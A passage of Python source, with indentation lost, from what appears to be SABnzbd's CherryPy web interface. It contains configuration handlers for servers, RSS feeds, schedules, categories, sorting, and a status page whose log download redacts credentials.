def ListColors(web_dir):
lst = []
web_dir = os.path.join(sabnzbd.DIR_INTERFACES, web_dir)
dd = os.path.abspath(web_dir + '/templates/static/stylesheets/colorschemes')
if (not dd) or (not os.access(dd, os.R_OK)):
return lst
for color in globber(dd):
col = color.replace('.css', '')
lst.append(col)
return lst
def add_color(skin_dir, color):
if skin_dir:
if not color:
try:
color = DEF_SKIN_COLORS[skin_dir.lower()]
except KeyError:
return skin_dir
return '%s - %s' % (skin_dir, color)
else:
return ''
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['configfn'] = config.get_filename()
conf['have_ssl_context'] = sabnzbd.HAVE_SSL_CONTEXT
conf['have_cryptography'] = bool(sabnzbd.HAVE_CRYPTOGRAPHY)
wlist = []
interfaces = globber_full(sabnzbd.DIR_INTERFACES)
for k in interfaces:
if k.endswith(DEF_STDCONFIG):
interfaces.remove(k)
continue
# TEMPORARY: Remove when smpl is really deprecated
# Do not show smpl unless it's the selected one
if k.endswith('smpl') and 'smpl' not in cfg.web_dir():
interfaces.remove(k)
for web in interfaces:
rweb = os.path.basename(web)
if os.access(web + '/' + DEF_MAIN_TMPL, os.R_OK):
cols = ListColors(rweb)
if cols:
for col in cols:
wlist.append(add_color(rweb, col))
else:
wlist.append(rweb)
conf['web_list'] = wlist
conf['web_dir'] = add_color(cfg.web_dir(), cfg.web_color())
conf['password'] = cfg.password.get_stars()
conf['language'] = cfg.language()
lang_list = list_languages()
if len(lang_list) < 2:
lang_list = []
conf['lang_list'] = lang_list
for kw in GENERAL_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['bandwidth_max'] = cfg.bandwidth_max()
conf['bandwidth_perc'] = cfg.bandwidth_perc()
conf['nzb_key'] = cfg.nzb_key()
conf['local_ranges'] = cfg.local_ranges.get_string()
conf['my_lcldata'] = cfg.admin_dir.get_path()
conf['caller_url'] = cherrypy.request.base + cfg.url_base()
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_general.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveGeneral(self, **kwargs):
# Handle general options
for kw in GENERAL_LIST:
item = config.get_config('misc', kw)
value = platform_encode(kwargs.get(kw))
msg = item.set(value)
if msg:
return badParameterResponse(msg)
# Handle special options
cfg.password.set(kwargs.get('password'))
web_dir = kwargs.get('web_dir')
change_web_dir(web_dir)
bandwidth_max = kwargs.get('bandwidth_max')
if bandwidth_max is not None:
cfg.bandwidth_max.set(bandwidth_max)
bandwidth_perc = kwargs.get('bandwidth_perc')
if bandwidth_perc is not None:
cfg.bandwidth_perc.set(bandwidth_perc)
bandwidth_perc = cfg.bandwidth_perc()
if bandwidth_perc and not bandwidth_max:
logging.warning(T('You must set a maximum bandwidth before you can set a bandwidth limit'))
config.save_config()
# Update CherryPy authentication
set_auth(cherrypy.config)
if kwargs.get('ajax'):
return sabnzbd.api.report('json', data={'success': True, 'restart_req': sabnzbd.RESTART_REQ})
else:
raise Raiser(self.__root)
def change_web_dir(web_dir):
try:
web_dir, web_color = web_dir.split(' - ')
except:
try:
web_color = DEF_SKIN_COLORS[web_dir.lower()]
except:
web_color = ''
web_dir_path = real_path(sabnzbd.DIR_INTERFACES, web_dir)
if not os.path.exists(web_dir_path):
return badParameterResponse('Cannot find web template: %s' % unicoder(web_dir_path))
else:
cfg.web_dir.set(web_dir)
cfg.web_color.set(web_color)
##############################################################################
class ConfigServer(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
new = []
servers = config.get_servers()
server_names = sorted(servers.keys(), key=lambda svr: '%d%02d%s' % (int(not servers[svr].enable()), servers[svr].priority(), servers[svr].displayname().lower()))
for svr in server_names:
new.append(servers[svr].get_dict(safe=True))
t, m, w, d, timeline = BPSMeter.do.amounts(svr)
if t:
new[-1]['amounts'] = to_units(t), to_units(m), to_units(w), to_units(d), timeline
conf['servers'] = new
conf['cats'] = list_cats(default=True)
conf['have_ssl_context'] = sabnzbd.HAVE_SSL_CONTEXT
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_server.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def addServer(self, **kwargs):
return handle_server(kwargs, self.__root, True)
@secured_expose(check_session_key=True, check_configlock=True)
def saveServer(self, **kwargs):
return handle_server(kwargs, self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def testServer(self, **kwargs):
return handle_server_test(kwargs, self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def delServer(self, **kwargs):
kwargs['section'] = 'servers'
kwargs['keyword'] = kwargs.get('server')
del_from_section(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def clrServer(self, **kwargs):
server = kwargs.get('server')
if server:
BPSMeter.do.clear_server(server)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def toggleServer(self, **kwargs):
server = kwargs.get('server')
if server:
svr = config.get_config('servers', server)
if svr:
svr.enable.set(not svr.enable())
config.save_config()
Downloader.do.update_server(server, server)
raise Raiser(self.__root)
def unique_svr_name(server):
""" Return a unique variant on given server name """
num = 0
svr = 1
new_name = server
while svr:
if num:
new_name = '%s@%d' % (server, num)
else:
new_name = '%s' % server
svr = config.get_config('servers', new_name)
num += 1
return new_name
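# Illustrative behaviour of unique_svr_name() (hypothetical server names, not taken
# from any real config):
#   unique_svr_name('news.example.com') -> 'news.example.com'   when the name is unused
#   unique_svr_name('news.example.com') -> 'news.example.com@1' when the plain name already exists
#   further collisions continue with '@2', '@3', ... until a free variant is found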
def check_server(host, port, ajax):
""" Check if server address resolves properly """
if host.lower() == 'localhost' and sabnzbd.AMBI_LOCALHOST:
return badParameterResponse(T('Warning: LOCALHOST is ambiguous, use numerical IP-address.'), ajax)
if GetServerParms(host, int_conv(port)):
return ""
else:
return badParameterResponse(T('Server address "%s:%s" is not valid.') % (host, port), ajax)
def handle_server(kwargs, root=None, new_svr=False):
""" Internal server handler """
ajax = kwargs.get('ajax')
host = kwargs.get('host', '').strip()
if not host:
return badParameterResponse(T('Server address required'), ajax)
port = kwargs.get('port', '').strip()
if not port:
if not kwargs.get('ssl', '').strip():
port = '119'
else:
port = '563'
kwargs['port'] = port
if kwargs.get('connections', '').strip() == '':
kwargs['connections'] = '1'
if kwargs.get('enable') == '1':
msg = check_server(host, port, ajax)
if msg:
return msg
# Default server name is just the host name
server = host
svr = None
old_server = kwargs.get('server')
if old_server:
svr = config.get_config('servers', old_server)
if svr:
server = old_server
else:
svr = config.get_config('servers', server)
if new_svr:
server = unique_svr_name(server)
for kw in ('ssl', 'send_group', 'enable', 'optional'):
if kw not in kwargs.keys():
kwargs[kw] = None
if svr and not new_svr:
svr.set_dict(kwargs)
else:
old_server = None
config.ConfigServer(server, kwargs)
config.save_config()
Downloader.do.update_server(old_server, server)
if root:
if ajax:
return sabnzbd.api.report('json')
else:
raise Raiser(root)
def handle_server_test(kwargs, root):
_result, msg = test_nntp_server_dict(kwargs)
return msg
##############################################################################
class ConfigRss(object):
def __init__(self, root):
self.__root = root
self.__refresh_readout = None # Set to URL when new readout is needed
self.__refresh_download = False # True when feed needs to be read
self.__refresh_force = False # True if forced download of all matches is required
self.__refresh_ignore = False # True if first batch of new feed must be ignored
self.__evaluate = False # True if feed needs to be re-filtered
self.__show_eval_button = False # True if the "Apply filters" button should be shown
self.__last_msg = '' # Last error message from RSS reader
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['scripts'] = list_scripts(default=True)
pick_script = conf['scripts'] != []
conf['categories'] = list_cats(default=True)
pick_cat = conf['categories'] != []
conf['rss_rate'] = cfg.rss_rate()
rss = {}
feeds = config.get_rss()
for feed in feeds:
rss[feed] = feeds[feed].get_dict()
filters = feeds[feed].filters()
rss[feed]['filters'] = filters
rss[feed]['filter_states'] = [bool(sabnzbd.rss.convert_filter(f[4])) for f in filters]
rss[feed]['filtercount'] = len(filters)
rss[feed]['pick_cat'] = pick_cat
rss[feed]['pick_script'] = pick_script
rss[feed]['link'] = urllib.quote_plus(feed.encode('utf-8'))
rss[feed]['baselink'] = [get_base_url(uri) for uri in rss[feed]['uri']]
rss[feed]['uris'] = feeds[feed].uri.get_string()
active_feed = kwargs.get('feed', '')
conf['active_feed'] = active_feed
conf['rss'] = rss
conf['rss_next'] = time.strftime(time_format('%H:%M'), time.localtime(sabnzbd.rss.next_run())).decode(codepage)
if active_feed:
readout = bool(self.__refresh_readout)
logging.debug('RSS READOUT = %s', readout)
if not readout:
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = False
if self.__evaluate:
msg = sabnzbd.rss.run_feed(active_feed, download=self.__refresh_download, force=self.__refresh_force,
ignoreFirst=self.__refresh_ignore, readout=readout)
else:
msg = ''
self.__evaluate = False
if readout:
sabnzbd.rss.save()
self.__last_msg = msg
else:
msg = self.__last_msg
self.__refresh_readout = None
conf['evalButton'] = self.__show_eval_button
conf['error'] = msg
conf['downloaded'], conf['matched'], conf['unmatched'] = GetRssLog(active_feed)
else:
self.__last_msg = ''
# Find a unique new Feed name
unum = 1
txt = T('Feed') # : Used as default Feed name in Config->RSS
while txt + str(unum) in feeds:
unum += 1
conf['feed'] = txt + str(unum)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_rss.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def save_rss_rate(self, **kwargs):
""" Save changed RSS automatic readout rate """
cfg.rss_rate.set(kwargs.get('rss_rate'))
config.save_config()
scheduler.restart()
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def upd_rss_feed(self, **kwargs):
""" Update Feed level attributes,
legacy version: ignores 'enable' parameter
"""
if kwargs.get('enable') is not None:
del kwargs['enable']
try:
cf = config.get_rss()[kwargs.get('feed')]
except KeyError:
cf = None
uri = Strip(kwargs.get('uri'))
if cf and uri:
kwargs['uri'] = uri
cf.set_dict(kwargs)
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def save_rss_feed(self, **kwargs):
""" Update Feed level attributes """
try:
cf = config.get_rss()[kwargs.get('feed')]
except KeyError:
cf = None
if 'enable' not in kwargs:
kwargs['enable'] = 0
uri = Strip(kwargs.get('uri'))
if cf and uri:
kwargs['uri'] = uri
cf.set_dict(kwargs)
config.save_config()
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def toggle_rss_feed(self, **kwargs):
""" Toggle automatic read-out flag of Feed """
try:
item = config.get_rss()[kwargs.get('feed')]
except KeyError:
item = None
if item:
item.enable.set(not item.enable())
config.save_config()
if kwargs.get('table'):
raise Raiser(self.__root)
else:
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def add_rss_feed(self, **kwargs):
""" Add one new RSS feed definition """
feed = Strip(kwargs.get('feed')).strip('[]')
uri = Strip(kwargs.get('uri'))
if feed and uri:
try:
cfg = config.get_rss()[feed]
except KeyError:
cfg = None
if (not cfg) and uri:
kwargs['feed'] = feed
kwargs['uri'] = uri
config.ConfigRSS(feed, kwargs)
# Clear out any existing reference to this feed name
# Otherwise first-run detection can fail
sabnzbd.rss.clear_feed(feed)
config.save_config()
self.__refresh_readout = feed
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = True
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
else:
raise Raiser(self.__root)
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def upd_rss_filter(self, **kwargs):
""" Wrapper, so we can call from api.py """
self.internal_upd_rss_filter(**kwargs)
def internal_upd_rss_filter(self, **kwargs):
""" Save updated filter definition """
try:
feed_cfg = config.get_rss()[kwargs.get('feed')]
except KeyError:
raise rssRaiser(self.__root, kwargs)
pp = kwargs.get('pp')
if IsNone(pp):
pp = ''
script = ConvertSpecials(kwargs.get('script'))
cat = ConvertSpecials(kwargs.get('cat'))
prio = ConvertSpecials(kwargs.get('priority'))
filt = kwargs.get('filter_text')
enabled = kwargs.get('enabled', '0')
if filt:
feed_cfg.filters.update(int(kwargs.get('index', 0)), (cat, pp, script, kwargs.get('filter_type'),
platform_encode(filt), prio, enabled))
# Move filter if requested
index = int_conv(kwargs.get('index', ''))
new_index = kwargs.get('new_index', '')
if new_index and int_conv(new_index) != index:
feed_cfg.filters.move(int(index), int_conv(new_index))
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def del_rss_feed(self, *args, **kwargs):
""" Remove complete RSS feed """
kwargs['section'] = 'rss'
kwargs['keyword'] = kwargs.get('feed')
del_from_section(kwargs)
sabnzbd.rss.clear_feed(kwargs.get('feed'))
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def del_rss_filter(self, **kwargs):
""" Wrapper, so we can call from api.py """
self.internal_del_rss_filter(**kwargs)
def internal_del_rss_filter(self, **kwargs):
""" Remove one RSS filter """
try:
feed_cfg = config.get_rss()[kwargs.get('feed')]
except KeyError:
raise rssRaiser(self.__root, kwargs)
feed_cfg.filters.delete(int(kwargs.get('index', 0)))
config.save_config()
self.__evaluate = False
self.__show_eval_button = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def download_rss_feed(self, *args, **kwargs):
""" Force download of all matching jobs in a feed """
if 'feed' in kwargs:
feed = kwargs['feed']
self.__refresh_readout = feed
self.__refresh_download = True
self.__refresh_force = True
self.__refresh_ignore = False
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def clean_rss_jobs(self, *args, **kwargs):
""" Remove processed RSS jobs from UI """
sabnzbd.rss.clear_downloaded(kwargs['feed'])
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def test_rss_feed(self, *args, **kwargs):
""" Read the feed content again and show results """
if 'feed' in kwargs:
feed = kwargs['feed']
self.__refresh_readout = feed
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = True
self.__evaluate = True
self.__show_eval_button = False
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def eval_rss_feed(self, *args, **kwargs):
""" Re-apply the filters to the feed """
if 'feed' in kwargs:
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = False
self.__show_eval_button = False
self.__evaluate = True
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def download(self, **kwargs):
""" Download NZB from provider (Download button) """
feed = kwargs.get('feed')
url = kwargs.get('url')
nzbname = kwargs.get('nzbname')
att = sabnzbd.rss.lookup_url(feed, url)
if att:
pp = att.get('pp')
cat = att.get('cat')
script = att.get('script')
prio = att.get('prio')
if url:
sabnzbd.add_url(url, pp, script, cat, prio, nzbname)
# Need to pass the title instead
sabnzbd.rss.flag_downloaded(feed, url)
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def rss_now(self, *args, **kwargs):
""" Run an automatic RSS run now """
scheduler.force_rss()
raise rssRaiser(self.__root, kwargs)
def ConvertSpecials(p):
""" Convert None to 'None' and 'Default' to '' """
if p is None:
p = 'None'
elif p.lower() == T('Default').lower():
p = ''
return p
def IsNone(value):
""" Return True if either None, 'None' or '' """
return value is None or value == "" or value.lower() == 'none'
def Strip(txt):
""" Return stripped string, can handle None """
try:
return txt.strip()
except:
return None
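# Quick reference for the three helpers above (values are illustrative):
#   ConvertSpecials(None)      -> 'None'
#   ConvertSpecials('Default') -> ''      (assuming T('Default') is 'Default' in the active language)
#   IsNone('none')             -> True
#   Strip('  text  ')          -> 'text'
#   Strip(None)                -> None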
##############################################################################
_SCHED_ACTIONS = ('resume', 'pause', 'pause_all', 'shutdown', 'restart', 'speedlimit',
'pause_post', 'resume_post', 'scan_folder', 'rss_scan', 'remove_failed',
'remove_completed', 'pause_all_low', 'pause_all_normal', 'pause_all_high',
'resume_all_low', 'resume_all_normal', 'resume_all_high',
'enable_quota', 'disable_quota'
)
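# Schedule lines are stored as space-separated strings of the form
#   '<enabled> <minute> <hour> <days-of-week> <action> [arguments]'
# e.g. (illustrative) '1 30 18 1234567 speedlimit 50%' runs the speedlimit action
# daily at 18:30; see addSchedule() for how lines are built and index() for parsing.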
class ConfigScheduling(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
def get_days():
days = {"*": T('Daily'), "1": T('Monday'), "2": T('Tuesday'), "3": T('Wednesday'), "4": T('Thursday'),
"5": T('Friday'), "6": T('Saturday'), "7": T('Sunday')}
return days
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
actions = []
actions.extend(_SCHED_ACTIONS)
day_names = get_days()
categories = list_cats(False)
snum = 1
conf['schedlines'] = []
conf['taskinfo'] = []
for ev in scheduler.sort_schedules(all_events=False):
line = ev[3]
conf['schedlines'].append(line)
try:
enabled, m, h, day_numbers, action = line.split(' ', 4)
except:
continue
action = action.strip()
try:
action, value = action.split(' ', 1)
except:
value = ''
value = value.strip()
if value and not value.lower().strip('0123456789kmgtp%.'):
if '%' not in value and from_units(value) < 1.0:
value = T('off') # : "Off" value for speedlimit in scheduler
else:
if '%' not in value and 1 < int_conv(value) < 101:
value += '%'
value = value.upper()
if action in actions:
action = Ttemplate("sch-" + action)
else:
if action in ('enable_server', 'disable_server'):
try:
value = '"%s"' % config.get_servers()[value].displayname()
except KeyError:
value = '"%s" <<< %s' % (value, T('Undefined server!'))
action = Ttemplate("sch-" + action)
if action in ('pause_cat', 'resume_cat'):
action = Ttemplate("sch-" + action)
if value not in categories:
# Category name change
value = '"%s" <<< %s' % (value, T('Incorrect parameter'))
else:
value = '"%s"' % value
if day_numbers == "1234567":
days_of_week = "Daily"
elif day_numbers == "12345":
days_of_week = "Weekdays"
elif day_numbers == "67":
days_of_week = "Weekends"
else:
days_of_week = ", ".join([day_names.get(i, "**") for i in day_numbers])
item = (snum, '%02d' % int(h), '%02d' % int(m), days_of_week, '%s %s' % (action, value), enabled)
conf['taskinfo'].append(item)
snum += 1
actions_lng = {}
for action in actions:
actions_lng[action] = Ttemplate("sch-" + action)
actions_servers = {}
servers = config.get_servers()
for srv in servers:
actions_servers[srv] = servers[srv].displayname()
conf['actions_servers'] = actions_servers
conf['actions'] = actions
conf['actions_lng'] = actions_lng
conf['categories'] = categories
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_scheduling.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def addSchedule(self, **kwargs):
servers = config.get_servers()
minute = kwargs.get('minute')
hour = kwargs.get('hour')
days_of_week = ''.join([str(x) for x in kwargs.get('daysofweek', '')])
if not days_of_week:
days_of_week = '1234567'
action = kwargs.get('action')
arguments = kwargs.get('arguments')
arguments = arguments.strip().lower()
if arguments in ('on', 'enable'):
arguments = '1'
elif arguments in ('off', 'disable'):
arguments = '0'
if minute and hour and days_of_week and action:
if action == 'speedlimit':
if not arguments or arguments.strip('0123456789kmgtp%.'):
arguments = 0
elif action in _SCHED_ACTIONS:
arguments = ''
elif action in servers:
if arguments == '1':
arguments = action
action = 'enable_server'
else:
arguments = action
action = 'disable_server'
elif action in ('pause_cat', 'resume_cat'):
# Need original category name, not lowercased
arguments = arguments.strip()
else:
# Something else, leave empty
action = None
if action:
sched = cfg.schedules()
sched.append('%s %s %s %s %s %s' %
(1, minute, hour, days_of_week, action, arguments))
cfg.schedules.set(sched)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def delSchedule(self, **kwargs):
schedules = cfg.schedules()
line = kwargs.get('line')
if line and line in schedules:
schedules.remove(line)
cfg.schedules.set(schedules)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def toggleSchedule(self, **kwargs):
schedules = cfg.schedules()
line = kwargs.get('line')
if line:
for i, schedule in enumerate(schedules):
if schedule == line:
# Toggle the schedule
schedule_split = schedule.split()
schedule_split[0] = '%d' % (schedule_split[0] == '0')
schedules[i] = ' '.join(schedule_split)
break
cfg.schedules.set(schedules)
config.save_config()
scheduler.restart(force=True)
raise Raiser(self.__root)
##############################################################################
class ConfigCats(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['scripts'] = list_scripts(default=True)
conf['defdir'] = cfg.complete_dir.get_path()
categories = config.get_ordered_categories()
conf['have_cats'] = len(categories) > 1
slotinfo = []
for cat in categories:
cat['newzbin'] = cat['newzbin'].replace('"', '&quot;')
slotinfo.append(cat)
# Add empty line
empty = {'name': '', 'order': '0', 'pp': '-1', 'script': '', 'dir': '', 'newzbin': '', 'priority': DEFAULT_PRIORITY}
slotinfo.insert(1, empty)
conf['slotinfo'] = slotinfo
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_cat.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def delete(self, **kwargs):
kwargs['section'] = 'categories'
kwargs['keyword'] = kwargs.get('name')
del_from_section(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def save(self, **kwargs):
name = kwargs.get('name', '*')
if name == '*':
newname = name
else:
newname = re.sub('"', '', kwargs.get('newname', ''))
if newname:
if kwargs.get('dir'):
kwargs['dir'] = platform_encode(kwargs['dir'])
# Check that this cat-dir is not a sub-folder of the incomplete (temporary download) folder
if same_file(cfg.download_dir.get_path(), real_path(cfg.complete_dir.get_path(), kwargs['dir'])):
return T('Category folder cannot be a subfolder of the Temporary Download Folder.')
# Delete current one and replace with new one
if name:
config.delete('categories', name)
config.ConfigCat(newname.lower(), kwargs)
config.save_config()
raise Raiser(self.__root)
##############################################################################
SORT_LIST = (
'enable_tv_sorting', 'tv_sort_string', 'tv_categories',
'enable_movie_sorting', 'movie_sort_string', 'movie_sort_extra', 'movie_extra_folder',
'enable_date_sorting', 'date_sort_string', 'movie_categories', 'date_categories'
)
class ConfigSorting(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['complete_dir'] = cfg.complete_dir.get_path()
for kw in SORT_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['categories'] = list_cats(False)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_sorting.tmpl'),
filter=FILTER, searchList=[conf], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSorting(self, **kwargs):
try:
kwargs['movie_categories'] = kwargs['movie_cat']
except:
pass
try:
kwargs['date_categories'] = kwargs['date_cat']
except:
pass
try:
kwargs['tv_categories'] = kwargs['tv_cat']
except:
pass
for kw in SORT_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
msg = item.set(value)
if msg:
return badParameterResponse(msg)
config.save_config()
raise Raiser(self.__root)
##############################################################################
LOG_API_RE = re.compile(r"(apikey|api)(=|:)[\w]+", re.I)
LOG_API_JSON_RE = re.compile(r"u'(apikey|api)': u'[\w]+'", re.I)
LOG_USER_RE = re.compile(r"(user|username)\s?=\s?[\S]+", re.I)
LOG_PASS_RE = re.compile(r"(password)\s?=\s?[\S]+", re.I)
LOG_INI_HIDE_RE = re.compile(r"(email_pwd|email_account|email_to|rating_api_key|pushover_token|pushover_userkey|pushbullet_apikey|prowl_apikey|growl_password|growl_server|IPv[4|6] address)\s?=\s?[\S]+", re.I)
LOG_HASH_RE = re.compile(r"([a-fA-F\d]{25})", re.I)
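# Illustrative effect of the sanitizing patterns used by showlog() below
# (the input fragments are made up):
#   LOG_API_RE.sub('apikey=<APIKEY>', 'apikey=0123456789abcdef') -> 'apikey=<APIKEY>'
#   LOG_PASS_RE.sub('password=<PASSWORD>', 'password = hunter2') -> 'password=<PASSWORD>'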
class Status(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
header = build_status(skip_dashboard=kwargs.get('skip_dashboard'))
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'status.tmpl'),
filter=FILTER, searchList=[header], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def reset_quota(self, **kwargs):
BPSMeter.do.reset_quota(force=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def disconnect(self, **kwargs):
Downloader.do.disconnect()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def refresh_conn(self, **kwargs):
# No real action, just reload the page
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def showlog(self, **kwargs):
try:
sabnzbd.LOGHANDLER.flush()
except:
pass
# Fetch the INI and the log-data and add a message at the top
log_data = '--------------------------------\n\n'
log_data += 'The log includes a copy of your sabnzbd.ini with\nall usernames, passwords and API-keys removed.'
log_data += '\n\n--------------------------------\n'
log_data += open(sabnzbd.LOGFILE, "r").read()
log_data += open(config.get_filename(), 'r').read()
# We need to remove all passwords/usernames/api-keys
log_data = LOG_API_RE.sub("apikey=<APIKEY>", log_data)
log_data = LOG_API_JSON_RE.sub("'apikey':<APIKEY>'", log_data)
log_data = LOG_USER_RE.sub(r'\g<1>=<USER>', log_data)
log_data = LOG_PASS_RE.sub("password=<PASSWORD>", log_data)
log_data = LOG_INI_HIDE_RE.sub(r"\1 = <REMOVED>", log_data)
log_data = LOG_HASH_RE.sub("<HASH>", log_data)
# Try to replace the username
try:
import getpass
cur_user = getpass.getuser()
if cur_user:
log_data = log_data.replace(cur_user, '<USERNAME>')
except:
pass
# Set headers
cherrypy.response.headers['Content-Type'] = 'application/x-download;charset=utf-8'
cherrypy.response.headers['Content-Disposition'] = 'attachment;filename="sabnzbd.log"'
return log_data
@secured_expose(check_session_key=True)
def clearwarnings(self, **kwargs):
sabnzbd.GUIHANDLER.clear()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def change_loglevel(self, **kwargs):
cfg.log_level.set(kwargs.get('loglevel'))
config.save_config()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def unblock_server(self, **kwargs):
Downloader.do.unblock(kwargs.get('server'))
# Short sleep so that UI shows new server status
time.sleep(1.0)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
orphan_delete(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def delete_all(self, **kwargs):
orphan_delete_all()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def add(self, **kwargs):
orphan_add(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def add_all(self, **kwargs):
orphan_add_all()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def dashrefresh(self, **kwargs):
# This function is run when Refresh button on Dashboard is clicked
# Put the time consuming dashboard functions here; they only get executed when the user clicks the Refresh button
# PyStone
sabnzbd.PYSTONE_SCORE = getpystone()
# Diskspeed
sabnzbd.DOWNLOAD_DIR_SPEED = round(diskspeedmeasure(sabnzbd.cfg.download_dir.get_path()), 1)
time.sleep(1.0)
sabnzbd.COMPLETE_DIR_SPEED = round(diskspeedmeasure(sabnzbd.cfg.complete_dir.get_path()), 1)
raise Raiser(self.__root) # Refresh screen
def orphan_delete(kwargs):
path = kwargs.get('name')
if path:
path = platform_encode(path)
path = os.path.join(long_path(cfg.download_dir.get_path()), path)
logging.info('Removing orphaned job %s', path)
remove_all(path, recursive=True)
def orphan_delete_all():
paths = NzbQueue.do.scan_jobs(all=False, action=False)
for path in paths:
kwargs = {'name': path}
orphan_delete(kwargs)
def orphan_add(kwargs):
path = kwargs.get('name')
if path:
path = platform_encode(path)
path = os.path.join(long_path(cfg.download_dir.get_path()), path)
logging.info('Re-adding orphaned job %s', path)
NzbQueue.do.repair_job(path, None, None)
def orphan_add_all():
paths = NzbQueue.do.scan_jobs(all=False, action=False)
for path in paths:
kwargs = {'name': path}
orphan_add(kwargs)
def badParameterResponse(msg, ajax=None):
""" Return a html page with error message and a 'back' button """
if ajax:
return sabnzbd.api.report('json', error=msg)
else:
return '''
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<title>SABnzbd %s - %s</title>
</head>
<body>
<h3>%s</h3>
%s
<br><br>
<FORM><INPUT TYPE="BUTTON" VALUE="%s" ONCLICK="history.go(-1)"></FORM>
</body>
</html>
''' % (sabnzbd.__version__, T('ERROR:'), T('Incorrect parameter'), unicoder(msg), T('Back'))
def ShowString(name, string):
""" Return a html page listing a file and a 'back' button """
try:
msg = TRANS(string)
except:
msg = "Encoding Error\n"
return '''
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<title>%s</title>
</head>
<body>
<FORM><INPUT TYPE="BUTTON" VALUE="%s" ONCLICK="history.go(-1)"></FORM>
<h3>%s</h3>
<code><pre>%s</pre></code>
</body>
</html>
''' % (xml_name(name), T('Back'), xml_name(name), escape(unicoder(msg)))
def GetRssLog(feed):
def make_item(job):
# Make a copy
job = job.copy()
# Now we apply some formatting
job['title'] = xml_name(job['title'])
